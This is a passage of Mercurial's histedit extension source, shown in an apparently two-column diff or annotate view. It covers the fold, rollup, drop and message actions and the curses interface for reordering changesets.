787 hg.update(repo, self.state.parentctxnode, quietempty=True)
789 applychanges(repo.ui, repo, rulectx, {})
788 applychanges(repo.ui, repo, rulectx, {})
790 raise error.InterventionRequired(
789 raise error.InterventionRequired(
791 _(b'Editing (%s), you may commit or record as needed now.')
790 _(b'Editing (%s), you may commit or record as needed now.')
792 % node.short(self.node),
791 % node.short(self.node),
793 hint=_(b'hg histedit --continue to resume'),
792 hint=_(b'hg histedit --continue to resume'),
794 )
793 )
795
794
796 def commiteditor(self):
795 def commiteditor(self):
797 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
796 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
798
797
799
798
800 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
799 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
801 class fold(histeditaction):
800 class fold(histeditaction):
802 def verify(self, prev, expected, seen):
801 def verify(self, prev, expected, seen):
803 """ Verifies semantic correctness of the fold rule"""
802 """ Verifies semantic correctness of the fold rule"""
804 super(fold, self).verify(prev, expected, seen)
803 super(fold, self).verify(prev, expected, seen)
805 repo = self.repo
804 repo = self.repo
806 if not prev:
805 if not prev:
807 c = repo[self.node].p1()
806 c = repo[self.node].p1()
808 elif not prev.verb in (b'pick', b'base'):
807 elif not prev.verb in (b'pick', b'base'):
809 return
808 return
810 else:
809 else:
811 c = repo[prev.node]
810 c = repo[prev.node]
812 if not c.mutable():
811 if not c.mutable():
813 raise error.ParseError(
812 raise error.ParseError(
814 _(b"cannot fold into public change %s") % node.short(c.node())
813 _(b"cannot fold into public change %s") % node.short(c.node())
815 )
814 )
816
815
817 def continuedirty(self):
816 def continuedirty(self):
818 repo = self.repo
817 repo = self.repo
819 rulectx = repo[self.node]
818 rulectx = repo[self.node]
820
819
821 commit = commitfuncfor(repo, rulectx)
820 commit = commitfuncfor(repo, rulectx)
822 commit(
821 commit(
823 text=b'fold-temp-revision %s' % node.short(self.node),
822 text=b'fold-temp-revision %s' % node.short(self.node),
824 user=rulectx.user(),
823 user=rulectx.user(),
825 date=rulectx.date(),
824 date=rulectx.date(),
826 extra=rulectx.extra(),
825 extra=rulectx.extra(),
827 )
826 )
828
827
829 def continueclean(self):
828 def continueclean(self):
830 repo = self.repo
829 repo = self.repo
831 ctx = repo[b'.']
830 ctx = repo[b'.']
832 rulectx = repo[self.node]
831 rulectx = repo[self.node]
833 parentctxnode = self.state.parentctxnode
832 parentctxnode = self.state.parentctxnode
834 if ctx.node() == parentctxnode:
833 if ctx.node() == parentctxnode:
835 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
834 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
836 return ctx, [(self.node, (parentctxnode,))]
835 return ctx, [(self.node, (parentctxnode,))]
837
836
838 parentctx = repo[parentctxnode]
837 parentctx = repo[parentctxnode]
839 newcommits = {
838 newcommits = {
840 c.node()
839 c.node()
841 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
840 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
842 }
841 }
843 if not newcommits:
842 if not newcommits:
844 repo.ui.warn(
843 repo.ui.warn(
845 _(
844 _(
846 b'%s: cannot fold - working copy is not a '
845 b'%s: cannot fold - working copy is not a '
847 b'descendant of previous commit %s\n'
846 b'descendant of previous commit %s\n'
848 )
847 )
849 % (node.short(self.node), node.short(parentctxnode))
848 % (node.short(self.node), node.short(parentctxnode))
850 )
849 )
851 return ctx, [(self.node, (ctx.node(),))]
850 return ctx, [(self.node, (ctx.node(),))]
852
851
853 middlecommits = newcommits.copy()
852 middlecommits = newcommits.copy()
854 middlecommits.discard(ctx.node())
853 middlecommits.discard(ctx.node())
855
854
856 return self.finishfold(
855 return self.finishfold(
857 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
856 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
858 )
857 )
859
858
860 def skipprompt(self):
859 def skipprompt(self):
861 """Returns true if the rule should skip the message editor.
860 """Returns true if the rule should skip the message editor.
862
861
863 For example, 'fold' wants to show an editor, but 'rollup'
862 For example, 'fold' wants to show an editor, but 'rollup'
864 doesn't want to.
863 doesn't want to.
865 """
864 """
866 return False
865 return False
867
866
868 def mergedescs(self):
867 def mergedescs(self):
869 """Returns true if the rule should merge messages of multiple changes.
868 """Returns true if the rule should merge messages of multiple changes.
870
869
871 This exists mainly so that 'rollup' rules can be a subclass of
870 This exists mainly so that 'rollup' rules can be a subclass of
872 'fold'.
871 'fold'.
873 """
872 """
874 return True
873 return True
875
874
876 def firstdate(self):
875 def firstdate(self):
877 """Returns true if the rule should preserve the date of the first
876 """Returns true if the rule should preserve the date of the first
878 change.
877 change.
879
878
880 This exists mainly so that 'rollup' rules can be a subclass of
879 This exists mainly so that 'rollup' rules can be a subclass of
881 'fold'.
880 'fold'.
882 """
881 """
883 return False
882 return False
884
883
885 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
884 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
886 parent = ctx.p1().node()
885 parent = ctx.p1().node()
887 hg.updaterepo(repo, parent, overwrite=False)
886 hg.updaterepo(repo, parent, overwrite=False)
888 ### prepare new commit data
887 ### prepare new commit data
889 commitopts = {}
888 commitopts = {}
890 commitopts[b'user'] = ctx.user()
889 commitopts[b'user'] = ctx.user()
891 # commit message
890 # commit message
892 if not self.mergedescs():
891 if not self.mergedescs():
893 newmessage = ctx.description()
892 newmessage = ctx.description()
894 else:
893 else:
895 newmessage = (
894 newmessage = (
896 b'\n***\n'.join(
895 b'\n***\n'.join(
897 [ctx.description()]
896 [ctx.description()]
898 + [repo[r].description() for r in internalchanges]
897 + [repo[r].description() for r in internalchanges]
899 + [oldctx.description()]
898 + [oldctx.description()]
900 )
899 )
901 + b'\n'
900 + b'\n'
902 )
901 )
903 commitopts[b'message'] = newmessage
902 commitopts[b'message'] = newmessage
904 # date
903 # date
905 if self.firstdate():
904 if self.firstdate():
906 commitopts[b'date'] = ctx.date()
905 commitopts[b'date'] = ctx.date()
907 else:
906 else:
908 commitopts[b'date'] = max(ctx.date(), oldctx.date())
907 commitopts[b'date'] = max(ctx.date(), oldctx.date())
909 # if date is to be updated to current
908 # if date is to be updated to current
910 if ui.configbool(b'rewrite', b'update-timestamp'):
909 if ui.configbool(b'rewrite', b'update-timestamp'):
911 commitopts[b'date'] = dateutil.makedate()
910 commitopts[b'date'] = dateutil.makedate()
912
911
913 extra = ctx.extra().copy()
912 extra = ctx.extra().copy()
914 # histedit_source
913 # histedit_source
915 # note: ctx is likely a temporary commit but that the best we can do
914 # note: ctx is likely a temporary commit but that the best we can do
916 # here. This is sufficient to solve issue3681 anyway.
915 # here. This is sufficient to solve issue3681 anyway.
917 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
916 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
918 commitopts[b'extra'] = extra
917 commitopts[b'extra'] = extra
919 phasemin = max(ctx.phase(), oldctx.phase())
918 phasemin = max(ctx.phase(), oldctx.phase())
920 overrides = {(b'phases', b'new-commit'): phasemin}
919 overrides = {(b'phases', b'new-commit'): phasemin}
921 with repo.ui.configoverride(overrides, b'histedit'):
920 with repo.ui.configoverride(overrides, b'histedit'):
922 n = collapse(
921 n = collapse(
923 repo,
922 repo,
924 ctx,
923 ctx,
925 repo[newnode],
924 repo[newnode],
926 commitopts,
925 commitopts,
927 skipprompt=self.skipprompt(),
926 skipprompt=self.skipprompt(),
928 )
927 )
929 if n is None:
928 if n is None:
930 return ctx, []
929 return ctx, []
931 hg.updaterepo(repo, n, overwrite=False)
930 hg.updaterepo(repo, n, overwrite=False)
932 replacements = [
931 replacements = [
933 (oldctx.node(), (newnode,)),
932 (oldctx.node(), (newnode,)),
934 (ctx.node(), (n,)),
933 (ctx.node(), (n,)),
935 (newnode, (n,)),
934 (newnode, (n,)),
936 ]
935 ]
937 for ich in internalchanges:
936 for ich in internalchanges:
938 replacements.append((ich, (n,)))
937 replacements.append((ich, (n,)))
939 return repo[n], replacements
938 return repo[n], replacements
940
939
941
940
942 @action(
941 @action(
943 [b'base', b'b'],
942 [b'base', b'b'],
944 _(b'checkout changeset and apply further changesets from there'),
943 _(b'checkout changeset and apply further changesets from there'),
945 )
944 )
946 class base(histeditaction):
945 class base(histeditaction):
947 def run(self):
946 def run(self):
948 if self.repo[b'.'].node() != self.node:
947 if self.repo[b'.'].node() != self.node:
949 mergemod.clean_update(self.repo[self.node])
948 mergemod.clean_update(self.repo[self.node])
950 return self.continueclean()
949 return self.continueclean()
951
950
952 def continuedirty(self):
951 def continuedirty(self):
953 abortdirty()
952 abortdirty()
954
953
955 def continueclean(self):
954 def continueclean(self):
956 basectx = self.repo[b'.']
955 basectx = self.repo[b'.']
957 return basectx, []
956 return basectx, []
958
957
959 def _verifynodeconstraints(self, prev, expected, seen):
958 def _verifynodeconstraints(self, prev, expected, seen):
960 # base can only be use with a node not in the edited set
959 # base can only be use with a node not in the edited set
961 if self.node in expected:
960 if self.node in expected:
962 msg = _(b'%s "%s" changeset was an edited list candidate')
961 msg = _(b'%s "%s" changeset was an edited list candidate')
963 raise error.ParseError(
962 raise error.ParseError(
964 msg % (self.verb, node.short(self.node)),
963 msg % (self.verb, node.short(self.node)),
965 hint=_(b'base must only use unlisted changesets'),
964 hint=_(b'base must only use unlisted changesets'),
966 )
965 )
967
966
968
967
969 @action(
968 @action(
970 [b'_multifold'],
969 [b'_multifold'],
971 _(
970 _(
972 """fold subclass used for when multiple folds happen in a row
971 """fold subclass used for when multiple folds happen in a row
973
972
974 We only want to fire the editor for the folded message once when
973 We only want to fire the editor for the folded message once when
975 (say) four changes are folded down into a single change. This is
974 (say) four changes are folded down into a single change. This is
976 similar to rollup, but we should preserve both messages so that
975 similar to rollup, but we should preserve both messages so that
977 when the last fold operation runs we can show the user all the
976 when the last fold operation runs we can show the user all the
978 commit messages in their editor.
977 commit messages in their editor.
979 """
978 """
980 ),
979 ),
981 internal=True,
980 internal=True,
982 )
981 )
983 class _multifold(fold):
982 class _multifold(fold):
984 def skipprompt(self):
983 def skipprompt(self):
985 return True
984 return True
986
985
987
986
988 @action(
987 @action(
989 [b"roll", b"r"],
988 [b"roll", b"r"],
990 _(b"like fold, but discard this commit's description and date"),
989 _(b"like fold, but discard this commit's description and date"),
991 )
990 )
992 class rollup(fold):
991 class rollup(fold):
993 def mergedescs(self):
992 def mergedescs(self):
994 return False
993 return False
995
994
996 def skipprompt(self):
995 def skipprompt(self):
997 return True
996 return True
998
997
999 def firstdate(self):
998 def firstdate(self):
1000 return True
999 return True
1001
1000
1002
1001
1003 @action([b"drop", b"d"], _(b'remove commit from history'))
1002 @action([b"drop", b"d"], _(b'remove commit from history'))
1004 class drop(histeditaction):
1003 class drop(histeditaction):
1005 def run(self):
1004 def run(self):
1006 parentctx = self.repo[self.state.parentctxnode]
1005 parentctx = self.repo[self.state.parentctxnode]
1007 return parentctx, [(self.node, tuple())]
1006 return parentctx, [(self.node, tuple())]
1008
1007
1009
1008
1010 @action(
1009 @action(
1011 [b"mess", b"m"],
1010 [b"mess", b"m"],
1012 _(b'edit commit message without changing commit content'),
1011 _(b'edit commit message without changing commit content'),
1013 priority=True,
1012 priority=True,
1014 )
1013 )
1015 class message(histeditaction):
1014 class message(histeditaction):
1016 def commiteditor(self):
1015 def commiteditor(self):
1017 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1016 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1018
1017
1019
1018
1020 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1019 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1021 """utility function to find the first outgoing changeset
1020 """utility function to find the first outgoing changeset
1022
1021
1023 Used by initialization code"""
1022 Used by initialization code"""
1024 if opts is None:
1023 if opts is None:
1025 opts = {}
1024 opts = {}
1026 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1025 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1027 dest, branches = hg.parseurl(dest, None)[:2]
1026 dest, branches = hg.parseurl(dest, None)[:2]
1028 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1027 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1029
1028
1030 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1029 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1031 other = hg.peer(repo, opts, dest)
1030 other = hg.peer(repo, opts, dest)
1032
1031
1033 if revs:
1032 if revs:
1034 revs = [repo.lookup(rev) for rev in revs]
1033 revs = [repo.lookup(rev) for rev in revs]
1035
1034
1036 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1035 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1037 if not outgoing.missing:
1036 if not outgoing.missing:
1038 raise error.Abort(_(b'no outgoing ancestors'))
1037 raise error.Abort(_(b'no outgoing ancestors'))
1039 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1038 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1040 if len(roots) > 1:
1039 if len(roots) > 1:
1041 msg = _(b'there are ambiguous outgoing revisions')
1040 msg = _(b'there are ambiguous outgoing revisions')
1042 hint = _(b"see 'hg help histedit' for more detail")
1041 hint = _(b"see 'hg help histedit' for more detail")
1043 raise error.Abort(msg, hint=hint)
1042 raise error.Abort(msg, hint=hint)
1044 return repo[roots[0]].node()
1043 return repo[roots[0]].node()
1045
1044
1046
1045
1047 # Curses Support
1046 # Curses Support
1048 try:
1047 try:
1049 import curses
1048 import curses
1050 except ImportError:
1049 except ImportError:
1051 curses = None
1050 curses = None
1052
1051
1053 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1052 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1054 ACTION_LABELS = {
1053 ACTION_LABELS = {
1055 b'fold': b'^fold',
1054 b'fold': b'^fold',
1056 b'roll': b'^roll',
1055 b'roll': b'^roll',
1057 }
1056 }
1058
1057
1059 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1058 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1060 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1059 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1061 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1060 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1062
1061
1063 E_QUIT, E_HISTEDIT = 1, 2
1062 E_QUIT, E_HISTEDIT = 1, 2
1064 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1063 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1065 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1064 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1066
1065
1067 KEYTABLE = {
1066 KEYTABLE = {
1068 b'global': {
1067 b'global': {
1069 b'h': b'next-action',
1068 b'h': b'next-action',
1070 b'KEY_RIGHT': b'next-action',
1069 b'KEY_RIGHT': b'next-action',
1071 b'l': b'prev-action',
1070 b'l': b'prev-action',
1072 b'KEY_LEFT': b'prev-action',
1071 b'KEY_LEFT': b'prev-action',
1073 b'q': b'quit',
1072 b'q': b'quit',
1074 b'c': b'histedit',
1073 b'c': b'histedit',
1075 b'C': b'histedit',
1074 b'C': b'histedit',
1076 b'v': b'showpatch',
1075 b'v': b'showpatch',
1077 b'?': b'help',
1076 b'?': b'help',
1078 },
1077 },
1079 MODE_RULES: {
1078 MODE_RULES: {
1080 b'd': b'action-drop',
1079 b'd': b'action-drop',
1081 b'e': b'action-edit',
1080 b'e': b'action-edit',
1082 b'f': b'action-fold',
1081 b'f': b'action-fold',
1083 b'm': b'action-mess',
1082 b'm': b'action-mess',
1084 b'p': b'action-pick',
1083 b'p': b'action-pick',
1085 b'r': b'action-roll',
1084 b'r': b'action-roll',
1086 b' ': b'select',
1085 b' ': b'select',
1087 b'j': b'down',
1086 b'j': b'down',
1088 b'k': b'up',
1087 b'k': b'up',
1089 b'KEY_DOWN': b'down',
1088 b'KEY_DOWN': b'down',
1090 b'KEY_UP': b'up',
1089 b'KEY_UP': b'up',
1091 b'J': b'move-down',
1090 b'J': b'move-down',
1092 b'K': b'move-up',
1091 b'K': b'move-up',
1093 b'KEY_NPAGE': b'move-down',
1092 b'KEY_NPAGE': b'move-down',
1094 b'KEY_PPAGE': b'move-up',
1093 b'KEY_PPAGE': b'move-up',
1095 b'0': b'goto', # Used for 0..9
1094 b'0': b'goto', # Used for 0..9
1096 },
1095 },
1097 MODE_PATCH: {
1096 MODE_PATCH: {
1098 b' ': b'page-down',
1097 b' ': b'page-down',
1099 b'KEY_NPAGE': b'page-down',
1098 b'KEY_NPAGE': b'page-down',
1100 b'KEY_PPAGE': b'page-up',
1099 b'KEY_PPAGE': b'page-up',
1101 b'j': b'line-down',
1100 b'j': b'line-down',
1102 b'k': b'line-up',
1101 b'k': b'line-up',
1103 b'KEY_DOWN': b'line-down',
1102 b'KEY_DOWN': b'line-down',
1104 b'KEY_UP': b'line-up',
1103 b'KEY_UP': b'line-up',
1105 b'J': b'down',
1104 b'J': b'down',
1106 b'K': b'up',
1105 b'K': b'up',
1107 },
1106 },
1108 MODE_HELP: {},
1107 MODE_HELP: {},
1109 }
1108 }
1110
1109
1111
1110
1112 def screen_size():
1111 def screen_size():
1113 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1112 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1114
1113
1115
1114
1116 class histeditrule(object):
1115 class histeditrule(object):
1117 def __init__(self, ui, ctx, pos, action=b'pick'):
1116 def __init__(self, ui, ctx, pos, action=b'pick'):
1118 self.ui = ui
1117 self.ui = ui
1119 self.ctx = ctx
1118 self.ctx = ctx
1120 self.action = action
1119 self.action = action
1121 self.origpos = pos
1120 self.origpos = pos
1122 self.pos = pos
1121 self.pos = pos
1123 self.conflicts = []
1122 self.conflicts = []
1124
1123
1125 def __bytes__(self):
1124 def __bytes__(self):
1126 # Example display of several histeditrules:
1125 # Example display of several histeditrules:
1127 #
1126 #
1128 # #10 pick 316392:06a16c25c053 add option to skip tests
1127 # #10 pick 316392:06a16c25c053 add option to skip tests
1129 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1128 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1130 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1129 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1131 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1130 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1132 #
1131 #
1133 # The carets point to the changeset being folded into ("roll this
1132 # The carets point to the changeset being folded into ("roll this
1134 # changeset into the changeset above").
1133 # changeset into the changeset above").
1135 return b'%s%s' % (self.prefix, self.desc)
1134 return b'%s%s' % (self.prefix, self.desc)
1136
1135
1137 __str__ = encoding.strmethod(__bytes__)
1136 __str__ = encoding.strmethod(__bytes__)
1138
1137
1139 @property
1138 @property
1140 def prefix(self):
1139 def prefix(self):
1141 # Some actions ('fold' and 'roll') combine a patch with a
1140 # Some actions ('fold' and 'roll') combine a patch with a
1142 # previous one. Add a marker showing which patch they apply
1141 # previous one. Add a marker showing which patch they apply
1143 # to.
1142 # to.
1144 action = ACTION_LABELS.get(self.action, self.action)
1143 action = ACTION_LABELS.get(self.action, self.action)
1145
1144
1146 h = self.ctx.hex()[0:12]
1145 h = self.ctx.hex()[0:12]
1147 r = self.ctx.rev()
1146 r = self.ctx.rev()
1148
1147
1149 return b"#%s %s %d:%s " % (
1148 return b"#%s %s %d:%s " % (
1150 (b'%d' % self.origpos).ljust(2),
1149 (b'%d' % self.origpos).ljust(2),
1151 action.ljust(6),
1150 action.ljust(6),
1152 r,
1151 r,
1153 h,
1152 h,
1154 )
1153 )
1155
1154
1156 @property
1155 @property
1157 def desc(self):
1156 def desc(self):
1158 summary = (
1157 summary = (
1159 cmdutil.rendertemplate(
1158 cmdutil.rendertemplate(
1160 self.ctx, self.ui.config(b'histedit', b'summary-template')
1159 self.ctx, self.ui.config(b'histedit', b'summary-template')
1161 )
1160 )
1162 or b''
1161 or b''
1163 )
1162 )
1164 if summary:
1163 if summary:
1165 return summary
1164 return summary
1166 # This is split off from the prefix property so that we can
1165 # This is split off from the prefix property so that we can
1167 # separately make the description for 'roll' red (since it
1166 # separately make the description for 'roll' red (since it
1168 # will get discarded).
1167 # will get discarded).
1169 return self.ctx.description().splitlines()[0].strip()
1168 return self.ctx.description().splitlines()[0].strip()
1170
1169
1171 def checkconflicts(self, other):
1170 def checkconflicts(self, other):
1172 if other.pos > self.pos and other.origpos <= self.origpos:
1171 if other.pos > self.pos and other.origpos <= self.origpos:
1173 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1172 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1174 self.conflicts.append(other)
1173 self.conflicts.append(other)
1175 return self.conflicts
1174 return self.conflicts
1176
1175
1177 if other in self.conflicts:
1176 if other in self.conflicts:
1178 self.conflicts.remove(other)
1177 self.conflicts.remove(other)
1179 return self.conflicts
1178 return self.conflicts
1180
1179
1181
1180
1182 # ============ EVENTS ===============
1181 # ============ EVENTS ===============
1183 def movecursor(state, oldpos, newpos):
1182 def movecursor(state, oldpos, newpos):
1184 '''Change the rule/changeset that the cursor is pointing to, regardless of
1183 '''Change the rule/changeset that the cursor is pointing to, regardless of
1185 current mode (you can switch between patches from the view patch window).'''
1184 current mode (you can switch between patches from the view patch window).'''
1186 state[b'pos'] = newpos
1185 state[b'pos'] = newpos
1187
1186
1188 mode, _ = state[b'mode']
1187 mode, _ = state[b'mode']
1189 if mode == MODE_RULES:
1188 if mode == MODE_RULES:
1190 # Scroll through the list by updating the view for MODE_RULES, so that
1189 # Scroll through the list by updating the view for MODE_RULES, so that
1191 # even if we are not currently viewing the rules, switching back will
1190 # even if we are not currently viewing the rules, switching back will
1192 # result in the cursor's rule being visible.
1191 # result in the cursor's rule being visible.
1193 modestate = state[b'modes'][MODE_RULES]
1192 modestate = state[b'modes'][MODE_RULES]
1194 if newpos < modestate[b'line_offset']:
1193 if newpos < modestate[b'line_offset']:
1195 modestate[b'line_offset'] = newpos
1194 modestate[b'line_offset'] = newpos
1196 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1195 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1197 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1196 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1198
1197
1199 # Reset the patch view region to the top of the new patch.
1198 # Reset the patch view region to the top of the new patch.
1200 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1199 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1201
1200
1202
1201
1203 def changemode(state, mode):
1202 def changemode(state, mode):
1204 curmode, _ = state[b'mode']
1203 curmode, _ = state[b'mode']
1205 state[b'mode'] = (mode, curmode)
1204 state[b'mode'] = (mode, curmode)
1206 if mode == MODE_PATCH:
1205 if mode == MODE_PATCH:
1207 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1206 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1208
1207
1209
1208
1210 def makeselection(state, pos):
1209 def makeselection(state, pos):
1211 state[b'selected'] = pos
1210 state[b'selected'] = pos
1212
1211
1213
1212
1214 def swap(state, oldpos, newpos):
1213 def swap(state, oldpos, newpos):
1215 """Swap two positions and calculate necessary conflicts in
1214 """Swap two positions and calculate necessary conflicts in
1216 O(|newpos-oldpos|) time"""
1215 O(|newpos-oldpos|) time"""
1217
1216
1218 rules = state[b'rules']
1217 rules = state[b'rules']
1219 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1218 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1220
1219
1221 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1220 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1222
1221
1223 # TODO: swap should not know about histeditrule's internals
1222 # TODO: swap should not know about histeditrule's internals
1224 rules[newpos].pos = newpos
1223 rules[newpos].pos = newpos
1225 rules[oldpos].pos = oldpos
1224 rules[oldpos].pos = oldpos
1226
1225
1227 start = min(oldpos, newpos)
1226 start = min(oldpos, newpos)
1228 end = max(oldpos, newpos)
1227 end = max(oldpos, newpos)
1229 for r in pycompat.xrange(start, end + 1):
1228 for r in pycompat.xrange(start, end + 1):
1230 rules[newpos].checkconflicts(rules[r])
1229 rules[newpos].checkconflicts(rules[r])
1231 rules[oldpos].checkconflicts(rules[r])
1230 rules[oldpos].checkconflicts(rules[r])
1232
1231
1233 if state[b'selected']:
1232 if state[b'selected']:
1234 makeselection(state, newpos)
1233 makeselection(state, newpos)
1235
1234
1236
1235
1237 def changeaction(state, pos, action):
1236 def changeaction(state, pos, action):
1238 """Change the action state on the given position to the new action"""
1237 """Change the action state on the given position to the new action"""
1239 rules = state[b'rules']
1238 rules = state[b'rules']
1240 assert 0 <= pos < len(rules)
1239 assert 0 <= pos < len(rules)
1241 rules[pos].action = action
1240 rules[pos].action = action
1242
1241
1243
1242
1244 def cycleaction(state, pos, next=False):
1243 def cycleaction(state, pos, next=False):
1245 """Changes the action state the next or the previous action from
1244 """Changes the action state the next or the previous action from
1246 the action list"""
1245 the action list"""
1247 rules = state[b'rules']
1246 rules = state[b'rules']
1248 assert 0 <= pos < len(rules)
1247 assert 0 <= pos < len(rules)
1249 current = rules[pos].action
1248 current = rules[pos].action
1250
1249
1251 assert current in KEY_LIST
1250 assert current in KEY_LIST
1252
1251
1253 index = KEY_LIST.index(current)
1252 index = KEY_LIST.index(current)
1254 if next:
1253 if next:
1255 index += 1
1254 index += 1
1256 else:
1255 else:
1257 index -= 1
1256 index -= 1
1258 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1257 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1259
1258
1260
1259
1261 def changeview(state, delta, unit):
1260 def changeview(state, delta, unit):
1262 '''Change the region of whatever is being viewed (a patch or the list of
1261 '''Change the region of whatever is being viewed (a patch or the list of
1263 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1262 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1264 mode, _ = state[b'mode']
1263 mode, _ = state[b'mode']
1265 if mode != MODE_PATCH:
1264 if mode != MODE_PATCH:
1266 return
1265 return
1267 mode_state = state[b'modes'][mode]
1266 mode_state = state[b'modes'][mode]
1268 num_lines = len(mode_state[b'patchcontents'])
1267 num_lines = len(mode_state[b'patchcontents'])
1269 page_height = state[b'page_height']
1268 page_height = state[b'page_height']
1270 unit = page_height if unit == b'page' else 1
1269 unit = page_height if unit == b'page' else 1
1271 num_pages = 1 + (num_lines - 1) // page_height
1270 num_pages = 1 + (num_lines - 1) // page_height
1272 max_offset = (num_pages - 1) * page_height
1271 max_offset = (num_pages - 1) * page_height
1273 newline = mode_state[b'line_offset'] + delta * unit
1272 newline = mode_state[b'line_offset'] + delta * unit
1274 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1273 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1275
1274
1276
1275
1277 def event(state, ch):
1276 def event(state, ch):
1278 """Change state based on the current character input
1277 """Change state based on the current character input
1279
1278
1280 This takes the current state and based on the current character input from
1279 This takes the current state and based on the current character input from
1281 the user we change the state.
1280 the user we change the state.
1282 """
1281 """
1283 selected = state[b'selected']
1282 selected = state[b'selected']
1284 oldpos = state[b'pos']
1283 oldpos = state[b'pos']
1285 rules = state[b'rules']
1284 rules = state[b'rules']
1286
1285
1287 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1286 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1288 return E_RESIZE
1287 return E_RESIZE
1289
1288
1290 lookup_ch = ch
1289 lookup_ch = ch
1291 if ch is not None and b'0' <= ch <= b'9':
1290 if ch is not None and b'0' <= ch <= b'9':
1292 lookup_ch = b'0'
1291 lookup_ch = b'0'
1293
1292
1294 curmode, prevmode = state[b'mode']
1293 curmode, prevmode = state[b'mode']
1295 action = KEYTABLE[curmode].get(
1294 action = KEYTABLE[curmode].get(
1296 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1295 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1297 )
1296 )
1298 if action is None:
1297 if action is None:
1299 return
1298 return
1300 if action in (b'down', b'move-down'):
1299 if action in (b'down', b'move-down'):
1301 newpos = min(oldpos + 1, len(rules) - 1)
1300 newpos = min(oldpos + 1, len(rules) - 1)
1302 movecursor(state, oldpos, newpos)
1301 movecursor(state, oldpos, newpos)
1303 if selected is not None or action == b'move-down':
1302 if selected is not None or action == b'move-down':
1304 swap(state, oldpos, newpos)
1303 swap(state, oldpos, newpos)
1305 elif action in (b'up', b'move-up'):
1304 elif action in (b'up', b'move-up'):
1306 newpos = max(0, oldpos - 1)
